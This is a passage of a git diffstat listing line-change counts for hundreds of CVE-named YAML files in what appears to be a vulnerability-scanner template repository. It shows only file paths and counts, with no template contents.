++-- http/cves/2019/CVE-2019-10758.yaml | 6 +++-- http/cves/2019/CVE-2019-11248.yaml | 7 ++++-- http/cves/2019/CVE-2019-11370.yaml | 5 ++-- http/cves/2019/CVE-2019-11510.yaml | 3 +++ http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 4 ++-- http/cves/2019/CVE-2019-11869.yaml | 4 ++-- http/cves/2019/CVE-2019-12276.yaml | 4 ++-- http/cves/2019/CVE-2019-12314.yaml | 4 ++-- http/cves/2019/CVE-2019-12461.yaml | 4 ++-- http/cves/2019/CVE-2019-12581.yaml | 2 ++ http/cves/2019/CVE-2019-12583.yaml | 5 +++- http/cves/2019/CVE-2019-12593.yaml | 5 ++-- http/cves/2019/CVE-2019-12616.yaml | 6 ++++- http/cves/2019/CVE-2019-12725.yaml | 5 +++- http/cves/2019/CVE-2019-12962.yaml | 5 ++-- http/cves/2019/CVE-2019-12985.yaml | 2 ++ http/cves/2019/CVE-2019-12986.yaml | 6 +++-- http/cves/2019/CVE-2019-12987.yaml | 6 +++-- http/cves/2019/CVE-2019-12988.yaml | 2 ++ http/cves/2019/CVE-2019-12990.yaml | 6 +++-- http/cves/2019/CVE-2019-13101.yaml | 8 +++---- http/cves/2019/CVE-2019-13392.yaml | 5 ++-- http/cves/2019/CVE-2019-13396.yaml | 4 ++-- http/cves/2019/CVE-2019-13462.yaml | 3 +++ http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 4 ++-- http/cves/2019/CVE-2019-14251.yaml | 4 ++-- http/cves/2019/CVE-2019-14312.yaml | 4 ++-- http/cves/2019/CVE-2019-14322.yaml | 11 +++++---- http/cves/2019/CVE-2019-14530.yaml | 7 ++++-- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 6 +++-- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 3 +++ http/cves/2019/CVE-2019-15043.yaml | 6 +++-- http/cves/2019/CVE-2019-15107.yaml | 3 +++ http/cves/2019/CVE-2019-15501.yaml | 3 ++- http/cves/2019/CVE-2019-15642.yaml | 2 ++ http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 ++ http/cves/2019/CVE-2019-15858.yaml | 4 ++-- http/cves/2019/CVE-2019-15889.yaml | 5 ++-- http/cves/2019/CVE-2019-16057.yaml | 1 + http/cves/2019/CVE-2019-16097.yaml | 2 ++ http/cves/2019/CVE-2019-16278.yaml | 4 ++-- http/cves/2019/CVE-2019-16469.yaml | 2 ++ http/cves/2019/CVE-2019-16662.yaml | 3 +++ http/cves/2019/CVE-2019-16759.yaml | 2 ++ http/cves/2019/CVE-2019-16931.yaml | 4 ++-- http/cves/2019/CVE-2019-16997.yaml | 4 ++-- http/cves/2019/CVE-2019-17382.yaml | 3 +++ http/cves/2019/CVE-2019-17444.yaml | 3 ++- http/cves/2019/CVE-2019-17538.yaml | 4 ++-- http/cves/2019/CVE-2019-17558.yaml | 3 +++ http/cves/2019/CVE-2019-17574.yaml | 6 +++-- http/cves/2019/CVE-2019-17662.yaml | 1 + http/cves/2019/CVE-2019-1821.yaml | 6 +++-- http/cves/2019/CVE-2019-18371.yaml | 6 +++-- http/cves/2019/CVE-2019-18393.yaml | 7 +++++- http/cves/2019/CVE-2019-18394.yaml | 9 ++++++-- http/cves/2019/CVE-2019-1898.yaml | 1 + http/cves/2019/CVE-2019-19368.yaml | 2 +- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 3 ++- http/cves/2019/CVE-2019-20210.yaml | 2 +- http/cves/2019/CVE-2019-20224.yaml | 3 +++ http/cves/2019/CVE-2019-20933.yaml | 2 ++ http/cves/2019/CVE-2019-2616.yaml | 4 ++-- http/cves/2019/CVE-2019-2729.yaml | 4 ++-- http/cves/2019/CVE-2019-3398.yaml | 1 + http/cves/2019/CVE-2019-3403.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 4 ++-- http/cves/2019/CVE-2019-3911.yaml | 4 +++- http/cves/2019/CVE-2019-3912.yaml | 2 ++ http/cves/2019/CVE-2019-3929.yaml | 4 ++-- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5418.yaml | 1 + http/cves/2019/CVE-2019-5434.yaml | 2 ++ http/cves/2019/CVE-2019-6112.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 4 ++-- http/cves/2019/CVE-2019-6715.yaml | 4 ++-- http/cves/2019/CVE-2019-6799.yaml | 1 + http/cves/2019/CVE-2019-6802.yaml | 1 + http/cves/2019/CVE-2019-7192.yaml | 2 ++ http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 3 ++- http/cves/2019/CVE-2019-7254.yaml | 3 +++ http/cves/2019/CVE-2019-7255.yaml | 2 ++ http/cves/2019/CVE-2019-7256.yaml | 8 ++++--- http/cves/2019/CVE-2019-7315.yaml | 8 +++---- http/cves/2019/CVE-2019-7609.yaml | 3 +++ http/cves/2019/CVE-2019-8086.yaml | 2 ++ http/cves/2019/CVE-2019-8390.yaml | 6 +++-- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 4 ++-- http/cves/2019/CVE-2019-8937.yaml | 3 +++ http/cves/2019/CVE-2019-8982.yaml | 4 ++-- http/cves/2019/CVE-2019-9618.yaml | 4 ++-- http/cves/2019/CVE-2019-9632.yaml | 4 ++-- http/cves/2019/CVE-2019-9670.yaml | 7 ++++-- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 5 ++-- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9922.yaml | 6 +++-- http/cves/2020/CVE-2020-0618.yaml | 4 ++-- http/cves/2020/CVE-2020-10199.yaml | 5 ++-- http/cves/2020/CVE-2020-10220.yaml | 4 +++- http/cves/2020/CVE-2020-10546.yaml | 5 +++- http/cves/2020/CVE-2020-10547.yaml | 3 +++ http/cves/2020/CVE-2020-10548.yaml | 3 +++ http/cves/2020/CVE-2020-10549.yaml | 5 +++- http/cves/2020/CVE-2020-10770.yaml | 8 +++++-- http/cves/2020/CVE-2020-10973.yaml | 1 + http/cves/2020/CVE-2020-11034.yaml | 3 +++ http/cves/2020/CVE-2020-11110.yaml | 2 ++ http/cves/2020/CVE-2020-11450.yaml | 4 ++-- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-11546.yaml | 2 ++ http/cves/2020/CVE-2020-11547.yaml | 4 +++- http/cves/2020/CVE-2020-11710.yaml | 1 + http/cves/2020/CVE-2020-11738.yaml | 1 + http/cves/2020/CVE-2020-11798.yaml | 1 + http/cves/2020/CVE-2020-11853.yaml | 4 ++-- http/cves/2020/CVE-2020-11854.yaml | 4 ++-- http/cves/2020/CVE-2020-11930.yaml | 4 +++- http/cves/2020/CVE-2020-11978.yaml | 6 +++-- http/cves/2020/CVE-2020-11991.yaml | 7 ++++-- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12116.yaml | 6 ++++- http/cves/2020/CVE-2020-12124.yaml | 6 +++-- http/cves/2020/CVE-2020-12127.yaml | 5 ++-- http/cves/2020/CVE-2020-12256.yaml | 2 ++ http/cves/2020/CVE-2020-12259.yaml | 4 +++- http/cves/2020/CVE-2020-12478.yaml | 5 ++-- http/cves/2020/CVE-2020-12720.yaml | 7 ++++-- http/cves/2020/CVE-2020-13117.yaml | 8 +++---- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 ++ http/cves/2020/CVE-2020-13167.yaml | 6 +++-- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 6 +++-- http/cves/2020/CVE-2020-13405.yaml | 5 +++- http/cves/2020/CVE-2020-13483.yaml | 4 +++- http/cves/2020/CVE-2020-13638.yaml | 6 +++-- http/cves/2020/CVE-2020-13820.yaml | 4 +++- http/cves/2020/CVE-2020-13851.yaml | 2 ++ http/cves/2020/CVE-2020-13927.yaml | 6 +++-- http/cves/2020/CVE-2020-13937.yaml | 2 ++ http/cves/2020/CVE-2020-13945.yaml | 3 +++ http/cves/2020/CVE-2020-14144.yaml | 6 +++-- http/cves/2020/CVE-2020-14179.yaml | 7 ++++-- http/cves/2020/CVE-2020-14181.yaml | 4 ++-- http/cves/2020/CVE-2020-14408.yaml | 4 +++- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 4 +++- http/cves/2020/CVE-2020-14864.yaml | 3 +++ http/cves/2020/CVE-2020-14882.yaml | 3 +++ http/cves/2020/CVE-2020-14883.yaml | 2 ++ http/cves/2020/CVE-2020-15129.yaml | 3 +++ http/cves/2020/CVE-2020-15148.yaml | 4 ++-- http/cves/2020/CVE-2020-15227.yaml | 2 +- http/cves/2020/CVE-2020-15500.yaml | 6 +++-- http/cves/2020/CVE-2020-15568.yaml | 1 + http/cves/2020/CVE-2020-15867.yaml | 3 +++ http/cves/2020/CVE-2020-15895.yaml | 3 ++- http/cves/2020/CVE-2020-16139.yaml | 4 ++-- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-16952.yaml | 4 ++-- http/cves/2020/CVE-2020-17362.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 5 +++- http/cves/2020/CVE-2020-17456.yaml | 8 +++---- http/cves/2020/CVE-2020-17463.yaml | 2 ++ http/cves/2020/CVE-2020-17496.yaml | 7 ++++-- http/cves/2020/CVE-2020-17505.yaml | 4 ++-- http/cves/2020/CVE-2020-17519.yaml | 6 ++--- http/cves/2020/CVE-2020-17526.yaml | 6 +++-- http/cves/2020/CVE-2020-17530.yaml | 3 +++ http/cves/2020/CVE-2020-18268.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 1 + http/cves/2020/CVE-2020-19283.yaml | 3 ++- http/cves/2020/CVE-2020-19360.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 6 +++-- http/cves/2020/CVE-2020-19515.yaml | 5 ++-- http/cves/2020/CVE-2020-1956.yaml | 1 + http/cves/2020/CVE-2020-20285.yaml | 5 ++-- http/cves/2020/CVE-2020-20300.yaml | 1 + http/cves/2020/CVE-2020-2036.yaml | 4 +++- http/cves/2020/CVE-2020-2096.yaml | 4 +++- http/cves/2020/CVE-2020-20982.yaml | 5 ++-- http/cves/2020/CVE-2020-21012.yaml | 4 ++-- http/cves/2020/CVE-2020-2103.yaml | 5 ++-- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 5 ++-- http/cves/2020/CVE-2020-22209.yaml | 4 ++-- http/cves/2020/CVE-2020-22210.yaml | 4 ++-- http/cves/2020/CVE-2020-22211.yaml | 4 ++-- http/cves/2020/CVE-2020-23015.yaml | 5 +++- http/cves/2020/CVE-2020-23517.yaml | 5 ++-- http/cves/2020/CVE-2020-23575.yaml | 6 +++-- http/cves/2020/CVE-2020-23697.yaml | 4 +++- http/cves/2020/CVE-2020-24148.yaml | 5 ++-- http/cves/2020/CVE-2020-24186.yaml | 4 ++-- http/cves/2020/CVE-2020-24312.yaml | 4 ++-- http/cves/2020/CVE-2020-24391.yaml | 3 +++ http/cves/2020/CVE-2020-24579.yaml | 4 ++-- http/cves/2020/CVE-2020-24589.yaml | 7 ++++-- http/cves/2020/CVE-2020-24701.yaml | 5 ++-- http/cves/2020/CVE-2020-24902.yaml | 3 ++- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-24912.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 4 ++-- http/cves/2020/CVE-2020-25223.yaml | 7 ++++-- http/cves/2020/CVE-2020-25506.yaml | 2 ++ http/cves/2020/CVE-2020-2551.yaml | 9 ++++++-- http/cves/2020/CVE-2020-25540.yaml | 4 ++-- http/cves/2020/CVE-2020-25864.yaml | 5 +++- http/cves/2020/CVE-2020-26214.yaml | 4 ++-- http/cves/2020/CVE-2020-26217.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 6 +++-- http/cves/2020/CVE-2020-26948.yaml | 3 +++ http/cves/2020/CVE-2020-2733.yaml | 4 ++-- http/cves/2020/CVE-2020-27467.yaml | 2 ++ http/cves/2020/CVE-2020-27481.yaml | 4 ++-- http/cves/2020/CVE-2020-27838.yaml | 2 ++ http/cves/2020/CVE-2020-27866.yaml | 4 ++-- http/cves/2020/CVE-2020-27982.yaml | 6 +++-- http/cves/2020/CVE-2020-27986.yaml | 4 ++-- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28188.yaml | 5 ++-- http/cves/2020/CVE-2020-28208.yaml | 3 +++ http/cves/2020/CVE-2020-28871.yaml | 7 +++--- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29227.yaml | 6 +++-- http/cves/2020/CVE-2020-29284.yaml | 4 ++-- http/cves/2020/CVE-2020-29395.yaml | 9 +++++--- http/cves/2020/CVE-2020-29583.yaml | 6 +++-- http/cves/2020/CVE-2020-3452.yaml | 8 +++---- http/cves/2020/CVE-2020-35234.yaml | 4 ++-- http/cves/2020/CVE-2020-35338.yaml | 4 ++-- http/cves/2020/CVE-2020-35476.yaml | 1 + http/cves/2020/CVE-2020-35489.yaml | 4 ++-- http/cves/2020/CVE-2020-35580.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 4 ++-- http/cves/2020/CVE-2020-35713.yaml | 4 ++-- http/cves/2020/CVE-2020-35736.yaml | 4 +++- http/cves/2020/CVE-2020-3580.yaml | 6 +++-- http/cves/2020/CVE-2020-35846.yaml | 6 +++-- http/cves/2020/CVE-2020-35847.yaml | 5 ++-- http/cves/2020/CVE-2020-35848.yaml | 6 +++-- http/cves/2020/CVE-2020-35984.yaml | 1 + http/cves/2020/CVE-2020-35985.yaml | 2 ++ http/cves/2020/CVE-2020-35986.yaml | 1 + http/cves/2020/CVE-2020-35987.yaml | 2 ++ http/cves/2020/CVE-2020-36112.yaml | 4 ++-- http/cves/2020/CVE-2020-36289.yaml | 4 ++-- http/cves/2020/CVE-2020-36365.yaml | 1 + http/cves/2020/CVE-2020-4463.yaml | 1 + http/cves/2020/CVE-2020-5191.yaml | 6 ++++- http/cves/2020/CVE-2020-5192.yaml | 4 +++- http/cves/2020/CVE-2020-5284.yaml | 4 +++- http/cves/2020/CVE-2020-5410.yaml | 6 ++--- http/cves/2020/CVE-2020-5777.yaml | 4 ++-- http/cves/2020/CVE-2020-5902.yaml | 3 +++ http/cves/2020/CVE-2020-6171.yaml | 4 +++- http/cves/2020/CVE-2020-6207.yaml | 4 ++-- http/cves/2020/CVE-2020-6287.yaml | 3 ++- http/cves/2020/CVE-2020-6637.yaml | 4 +++- http/cves/2020/CVE-2020-6950.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 3 +-- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 6 ++++- http/cves/2020/CVE-2020-7796.yaml | 3 +++ http/cves/2020/CVE-2020-7943.yaml | 5 ++-- http/cves/2020/CVE-2020-7961.yaml | 2 ++ http/cves/2020/CVE-2020-7980.yaml | 6 +++-- http/cves/2020/CVE-2020-8115.yaml | 5 +++- http/cves/2020/CVE-2020-8163.yaml | 1 + http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8193.yaml | 2 +- http/cves/2020/CVE-2020-8497.yaml | 3 +++ http/cves/2020/CVE-2020-8512.yaml | 4 +++- http/cves/2020/CVE-2020-8515.yaml | 2 +- http/cves/2020/CVE-2020-8615.yaml | 6 +++-- http/cves/2020/CVE-2020-8641.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 4 ++-- http/cves/2020/CVE-2020-8772.yaml | 4 ++-- http/cves/2020/CVE-2020-8813.yaml | 3 +++ http/cves/2020/CVE-2020-8982.yaml | 4 ++-- http/cves/2020/CVE-2020-9036.yaml | 3 +++ http/cves/2020/CVE-2020-9315.yaml | 1 + http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9376.yaml | 2 +- http/cves/2020/CVE-2020-9402.yaml | 1 + http/cves/2020/CVE-2020-9425.yaml | 9 ++++++-- http/cves/2020/CVE-2020-9484.yaml | 2 ++ http/cves/2020/CVE-2020-9496.yaml | 2 ++ http/cves/2020/CVE-2020-9757.yaml | 3 +++ http/cves/2021/CVE-2021-1472.yaml | 1 + http/cves/2021/CVE-2021-1498.yaml | 4 ++-- http/cves/2021/CVE-2021-1499.yaml | 8 +++---- http/cves/2021/CVE-2021-20031.yaml | 8 +++---- http/cves/2021/CVE-2021-20091.yaml | 7 +++--- http/cves/2021/CVE-2021-20114.yaml | 4 ++-- http/cves/2021/CVE-2021-20123.yaml | 5 ++-- http/cves/2021/CVE-2021-20124.yaml | 5 ++-- http/cves/2021/CVE-2021-20137.yaml | 8 +++---- http/cves/2021/CVE-2021-20150.yaml | 1 + http/cves/2021/CVE-2021-20158.yaml | 1 + http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 4 +++- http/cves/2021/CVE-2021-20792.yaml | 4 ++-- http/cves/2021/CVE-2021-20837.yaml | 5 +++- http/cves/2021/CVE-2021-21087.yaml | 6 +++-- http/cves/2021/CVE-2021-21234.yaml | 4 ++-- http/cves/2021/CVE-2021-21287.yaml | 7 ++++-- http/cves/2021/CVE-2021-21307.yaml | 4 ++-- http/cves/2021/CVE-2021-21311.yaml | 5 ++-- http/cves/2021/CVE-2021-21351.yaml | 4 ++-- http/cves/2021/CVE-2021-21389.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 5 ++-- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21799.yaml | 8 +++++-- http/cves/2021/CVE-2021-21800.yaml | 5 ++-- http/cves/2021/CVE-2021-21801.yaml | 2 ++ http/cves/2021/CVE-2021-21802.yaml | 6 +++-- http/cves/2021/CVE-2021-21803.yaml | 6 +++-- http/cves/2021/CVE-2021-21805.yaml | 1 + http/cves/2021/CVE-2021-21978.yaml | 4 ++-- http/cves/2021/CVE-2021-22005.yaml | 4 ++-- http/cves/2021/CVE-2021-22053.yaml | 4 ++-- http/cves/2021/CVE-2021-22054.yaml | 4 ++-- http/cves/2021/CVE-2021-22122.yaml | 5 ++-- http/cves/2021/CVE-2021-22145.yaml | 5 ++-- http/cves/2021/CVE-2021-22205.yaml | 2 ++ http/cves/2021/CVE-2021-22214.yaml | 4 +++- http/cves/2021/CVE-2021-22707.yaml | 5 ++-- http/cves/2021/CVE-2021-22873.yaml | 4 +++- http/cves/2021/CVE-2021-22911.yaml | 2 ++ http/cves/2021/CVE-2021-22986.yaml | 3 +++ http/cves/2021/CVE-2021-24145.yaml | 6 ++--- http/cves/2021/CVE-2021-24165.yaml | 3 +++ http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 3 +-- http/cves/2021/CVE-2021-24215.yaml | 6 +++-- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 3 +-- http/cves/2021/CVE-2021-24275.yaml | 3 +++ http/cves/2021/CVE-2021-24276.yaml | 5 +++- http/cves/2021/CVE-2021-24278.yaml | 4 ++-- http/cves/2021/CVE-2021-24285.yaml | 6 +++-- http/cves/2021/CVE-2021-24286.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 6 +++-- http/cves/2021/CVE-2021-24291.yaml | 3 +++ http/cves/2021/CVE-2021-24316.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 5 ++-- http/cves/2021/CVE-2021-24340.yaml | 8 +++++-- http/cves/2021/CVE-2021-24347.yaml | 5 ++-- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24358.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 6 +++-- http/cves/2021/CVE-2021-24435.yaml | 4 ++-- http/cves/2021/CVE-2021-24442.yaml | 6 +++-- http/cves/2021/CVE-2021-24472.yaml | 2 ++ http/cves/2021/CVE-2021-24495.yaml | 4 ++-- http/cves/2021/CVE-2021-24498.yaml | 4 ++-- http/cves/2021/CVE-2021-24510.yaml | 4 ++-- http/cves/2021/CVE-2021-24554.yaml | 4 ++-- http/cves/2021/CVE-2021-24627.yaml | 6 +++-- http/cves/2021/CVE-2021-24647.yaml | 4 ++-- http/cves/2021/CVE-2021-24731.yaml | 4 ++-- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 4 ++-- http/cves/2021/CVE-2021-24838.yaml | 4 +++- http/cves/2021/CVE-2021-24849.yaml | 4 +++- http/cves/2021/CVE-2021-24862.yaml | 4 ++-- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 4 ++-- http/cves/2021/CVE-2021-24915.yaml | 6 +++-- http/cves/2021/CVE-2021-24917.yaml | 6 +++-- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 6 +++-- http/cves/2021/CVE-2021-24946.yaml | 4 ++-- http/cves/2021/CVE-2021-24947.yaml | 4 ++-- http/cves/2021/CVE-2021-24970.yaml | 5 ++-- http/cves/2021/CVE-2021-24979.yaml | 3 +++ http/cves/2021/CVE-2021-25003.yaml | 4 ++-- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 ++ http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 4 +++- http/cves/2021/CVE-2021-25065.yaml | 4 +++- http/cves/2021/CVE-2021-25067.yaml | 4 +++- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25079.yaml | 2 +- http/cves/2021/CVE-2021-25085.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 7 ++++-- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 6 +++-- http/cves/2021/CVE-2021-25297.yaml | 6 +++-- http/cves/2021/CVE-2021-25298.yaml | 2 ++ http/cves/2021/CVE-2021-25299.yaml | 6 +++-- http/cves/2021/CVE-2021-25646.yaml | 4 ++-- http/cves/2021/CVE-2021-25864.yaml | 4 +++- http/cves/2021/CVE-2021-25899.yaml | 1 + http/cves/2021/CVE-2021-26084.yaml | 5 ++-- http/cves/2021/CVE-2021-26085.yaml | 6 +++-- http/cves/2021/CVE-2021-26086.yaml | 4 ++-- http/cves/2021/CVE-2021-26247.yaml | 5 +++- http/cves/2021/CVE-2021-26294.yaml | 4 ++-- http/cves/2021/CVE-2021-26295.yaml | 1 + http/cves/2021/CVE-2021-26598.yaml | 5 ++-- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26710.yaml | 4 ++-- http/cves/2021/CVE-2021-26723.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 4 +++- http/cves/2021/CVE-2021-26855.yaml | 2 ++ http/cves/2021/CVE-2021-27124.yaml | 4 ++-- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 4 ++-- http/cves/2021/CVE-2021-27319.yaml | 4 ++-- http/cves/2021/CVE-2021-27320.yaml | 4 ++-- http/cves/2021/CVE-2021-27330.yaml | 2 ++ http/cves/2021/CVE-2021-27358.yaml | 2 ++ http/cves/2021/CVE-2021-27519.yaml | 3 ++- http/cves/2021/CVE-2021-27520.yaml | 3 ++- http/cves/2021/CVE-2021-27561.yaml | 6 +++-- http/cves/2021/CVE-2021-27651.yaml | 4 ++-- http/cves/2021/CVE-2021-27670.yaml | 2 ++ http/cves/2021/CVE-2021-27850.yaml | 3 ++- http/cves/2021/CVE-2021-27905.yaml | 3 +++ http/cves/2021/CVE-2021-27909.yaml | 6 +++-- http/cves/2021/CVE-2021-27931.yaml | 6 +++-- http/cves/2021/CVE-2021-28150.yaml | 4 +++- http/cves/2021/CVE-2021-28164.yaml | 5 ++-- http/cves/2021/CVE-2021-28169.yaml | 5 ++-- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28419.yaml | 4 ++-- http/cves/2021/CVE-2021-28937.yaml | 10 ++++---- http/cves/2021/CVE-2021-29006.yaml | 2 ++ http/cves/2021/CVE-2021-29156.yaml | 6 +++-- http/cves/2021/CVE-2021-29200.yaml | 4 ++-- http/cves/2021/CVE-2021-29203.yaml | 4 ++-- http/cves/2021/CVE-2021-29442.yaml | 4 ++-- http/cves/2021/CVE-2021-29484.yaml | 1 + http/cves/2021/CVE-2021-29490.yaml | 4 +++- http/cves/2021/CVE-2021-29622.yaml | 5 ++-- http/cves/2021/CVE-2021-29625.yaml | 4 ++++ http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 6 +++-- http/cves/2021/CVE-2021-30128.yaml | 5 ++-- http/cves/2021/CVE-2021-30134.yaml | 5 ++-- http/cves/2021/CVE-2021-30151.yaml | 6 +++-- http/cves/2021/CVE-2021-3017.yaml | 8 +++---- http/cves/2021/CVE-2021-30175.yaml | 5 ++-- http/cves/2021/CVE-2021-3019.yaml | 4 ++-- http/cves/2021/CVE-2021-30213.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 8 +++++-- http/cves/2021/CVE-2021-30497.yaml | 4 ++-- http/cves/2021/CVE-2021-3110.yaml | 3 ++- http/cves/2021/CVE-2021-31195.yaml | 2 ++ http/cves/2021/CVE-2021-31250.yaml | 4 ++-- http/cves/2021/CVE-2021-31537.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 8 ++++--- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 4 ++-- http/cves/2021/CVE-2021-31682.yaml | 5 ++-- http/cves/2021/CVE-2021-31755.yaml | 4 ++-- http/cves/2021/CVE-2021-31805.yaml | 3 +++ http/cves/2021/CVE-2021-31862.yaml | 2 ++ http/cves/2021/CVE-2021-3223.yaml | 1 + http/cves/2021/CVE-2021-32618.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 4 ++-- http/cves/2021/CVE-2021-32853.yaml | 2 ++ http/cves/2021/CVE-2021-3297.yaml | 4 ++-- http/cves/2021/CVE-2021-33044.yaml | 5 ++-- http/cves/2021/CVE-2021-33221.yaml | 4 ++-- http/cves/2021/CVE-2021-33357.yaml | 6 +++-- http/cves/2021/CVE-2021-33690.yaml | 1 + http/cves/2021/CVE-2021-3374.yaml | 4 +++- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-33807.yaml | 4 ++-- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34429.yaml | 1 + http/cves/2021/CVE-2021-34473.yaml | 3 +++ http/cves/2021/CVE-2021-34640.yaml | 5 ++-- http/cves/2021/CVE-2021-34643.yaml | 4 ++-- http/cves/2021/CVE-2021-34805.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 5 ++-- http/cves/2021/CVE-2021-35336.yaml | 8 +++---- http/cves/2021/CVE-2021-35395.yaml | 5 ++-- http/cves/2021/CVE-2021-35464.yaml | 6 +++-- http/cves/2021/CVE-2021-35488.yaml | 3 ++- http/cves/2021/CVE-2021-35587.yaml | 1 + http/cves/2021/CVE-2021-3577.yaml | 6 +++-- http/cves/2021/CVE-2021-36260.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 4 ++-- http/cves/2021/CVE-2021-36380.yaml | 8 ++++--- http/cves/2021/CVE-2021-36450.yaml | 2 ++ http/cves/2021/CVE-2021-3654.yaml | 4 ++-- http/cves/2021/CVE-2021-36580.yaml | 4 +++- http/cves/2021/CVE-2021-36748.yaml | 4 ++-- http/cves/2021/CVE-2021-37304.yaml | 3 ++- http/cves/2021/CVE-2021-37305.yaml | 1 + http/cves/2021/CVE-2021-37416.yaml | 6 +++-- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 5 ++-- http/cves/2021/CVE-2021-37589.yaml | 6 +++-- http/cves/2021/CVE-2021-37704.yaml | 4 ++-- http/cves/2021/CVE-2021-37833.yaml | 7 ++++-- http/cves/2021/CVE-2021-38540.yaml | 6 +++-- http/cves/2021/CVE-2021-38702.yaml | 5 ++-- http/cves/2021/CVE-2021-38704.yaml | 6 +++-- http/cves/2021/CVE-2021-39165.yaml | 5 ++-- http/cves/2021/CVE-2021-39211.yaml | 7 ++++-- http/cves/2021/CVE-2021-39226.yaml | 2 ++ http/cves/2021/CVE-2021-39320.yaml | 4 ++-- http/cves/2021/CVE-2021-39433.yaml | 4 ++-- 